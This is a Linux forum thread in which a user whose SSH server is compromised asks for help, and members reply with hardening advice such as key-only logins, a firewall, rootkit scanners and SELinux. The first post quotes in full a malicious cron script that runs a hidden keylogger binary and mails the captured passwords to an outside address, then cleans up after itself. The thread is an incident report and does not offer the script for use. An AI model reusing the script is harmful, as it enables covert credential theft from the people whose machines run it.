Find the answer to your Linux question:
Results 1 to 9 of 9
I am facing a wired situation. Every time I ssh to my linux box, it automaticall send the root password to fackgames@gmail.com . Beside this I get a unusual cron ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Sep 2008
    Posts
    3

    ssh server compromized


    I am facing a wired situation. Every time I ssh to my linux box, it automaticall send the root password to fackgames@gmail.com. Beside this I get a unusual cron under .etc/cron.daily. it's name dnsquery. Here is the content:

    #!/bin/sh
    cd /usr/lib/
    ./popauth -r httpd.log > test
    mkdir /usr/share/misc/
    mkdir /usr/share/misc/blah/
    cat /usr/share/misc/blah/temp.log |uniq >> test
    echo >/usr/share/misc/blah/temp.log
    mail fackgames@gmail.com -s "$(hostname -f)" < test
    rm -rf test httpd.log
    A=$PATH
    killall -9 popauth
    export PATH=/usr/lib/
    popauth -w httpd.log &
    export PATH=$A

    I have format the box and reinstall, but face the same. I have tried with uninstall the openssh & install it again. It goes ok for fewdays; after tahat the same. Any clue?

  2. #2
    Super Moderator Roxoff's Avatar
    Join Date
    Aug 2005
    Location
    Nottingham, England
    Posts
    3,930
    How can it send the root password to an email address? Linux doesn't store the root password in a form that can be read, it's hashed.

    My recommendation is to disconnect from the network, re-install, and take the following precautions:

    - use a new username for yourself and use a strong password, don't re-use your user home directory, use a new one and copy in any data files you want (i.e. don't re-use any desktop or system settings for the new user)
    - turn on the firewall and ensure it's locked down
    - install root-kit detection software
    - only ever log in as a regular user
    - turn off ssh logins as the root user, and put ssh on a different port
    - make sure SELinux is installed and turned on, read up on how it works and what you can do with it.
    - Only then plug in to the internet, and run your updates
    - thank your lucky stars you're using Linux, you'd have had no idea you were compromised on the major commercial operating system
    Linux user #126863 - see http://linuxcounter.net/

  3. #3
    Just Joined!
    Join Date
    Sep 2008
    Posts
    3
    Roxoff, thanks for your mail. Actually it doesn't mail the root password from etc/shadow or password file. When I login and type my root password, it copy the keystroke and send the mail. If I login in as normal user and sudo to root, it also mail the password.

    I remove the openssh and reinstall it again. It is ok now. But I need the clue how does it happen?

  4. $spacer_open
    $spacer_close
  5. #4
    Linux Engineer GNU-Fan's Avatar
    Join Date
    Mar 2008
    Posts
    935
    Please tell us the specific distribution/version you were using. The loophole does not necessarily have to be in SSH.
    Debian GNU/Linux -- You know you want it.

  6. #5
    Just Joined!
    Join Date
    Sep 2008
    Posts
    3
    I face the same problem for Fedora 8 and CentOS 5

  7. #6
    Linux Engineer Freston's Avatar
    Join Date
    Mar 2007
    Location
    The Netherlands
    Posts
    1,049
    Can you find out where the attacker is coming from? Maybe he left traces in your logs.

    That way you can determine how he comes in, which may lead to knowing where your system is vulnerable. I think this is important because if multiple reinstalls don't shut this attacker out, then either you have an attacker with a particular interest in your box or you have an oversight in your security policy. Neither need be of a technical nature.

    It requires some skill and a lot of knowledge to install a key logger on the root account of a foreign machine. Roxoff gave some excellent advice on how to counter this. But for safeties sake I'd delve into monitoring too. Keep a close eye on the logs, and maybe even automate this.
    Can't tell an OS by it's GUI

  8. #7
    Linux Enthusiast meton_magis's Avatar
    Join Date
    Oct 2006
    Location
    arizona
    Posts
    699
    If you want to be REALY secure (I'm quite paranoid, and err on the side of caution) creat an SSH key for your NON-root user, with a password, and do everything else that was listed above. In adition, shut off all forms of authentication, except for keypair. then, even if they capture your password with a keyloger device, they still need your private key (dont store it on your PC, keep it on a flash drive, with a backup somewhere).

    NOTE: i'm pretty sure that your private key is never transmited in a way that even a hacker with control over your box could sniff it. I THINK that you just send data that was signed, that your public key can verify. I'm not 100&#37; sure how it works, but i think that is it.
    New to the internet, technical forums, or the hacker / open source community??
    Read this to learn good posting habits http://www.catb.org/~esr/faqs/smart-questions.html

    RHCE for RHEL version 5
    RHCT for RHEL version 4

  9. #8
    Super Moderator Roxoff's Avatar
    Join Date
    Aug 2005
    Location
    Nottingham, England
    Posts
    3,930
    Quote Originally Posted by meton_magis View Post
    If you want to be REALY secure (I'm quite paranoid, and err on the side of caution) creat an SSH key for your NON-root user, with a password, and do everything else that was listed above. In adition, shut off all forms of authentication, except for keypair. then, even if they capture your password with a keyloger device, they still need your private key (dont store it on your PC, keep it on a flash drive, with a backup somewhere).
    This is the way smart card logon is handled; but the authentication key is stored on a smart card which it never comes off of. To unencrypt with the private key on the card, your system sends the data to the card which unencrypts it.

    Quote Originally Posted by meton_magis View Post
    NOTE: i'm pretty sure that your private key is never transmited in a way that even a hacker with control over your box could sniff it. I THINK that you just send data that was signed, that your public key can verify. I'm not 100% sure how it works, but i think that is it.
    You are right, if someone captures your public key and your password, they're still unlikely to be able to get in; they can brute-force attack a key, but with 1024 bit or (even better) 2048 bit encryption keys, you can make cracking the numbers statistically impossible within the cracker's (or your) lifetime.

    Of course, with physical access to your machine, they can still be in within a few seconds.
    Linux user #126863 - see http://linuxcounter.net/

  10. #9
    Linux Enthusiast meton_magis's Avatar
    Join Date
    Oct 2006
    Location
    arizona
    Posts
    699
    Of course, with physical access to your machine, they can still be in within a few seconds.

    Which is always fun to do. I had to crack my own system in a linux class after someone reset my root password, and put a ciphered password on my Grub menu. Luckily I didn't have to open the case and jump the cmos, all i had to do was whip out a RHEL recovery disk, and remove the grub password.
    New to the internet, technical forums, or the hacker / open source community??
    Read this to learn good posting habits http://www.catb.org/~esr/faqs/smart-questions.html

    RHCE for RHEL version 5
    RHCT for RHEL version 4

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •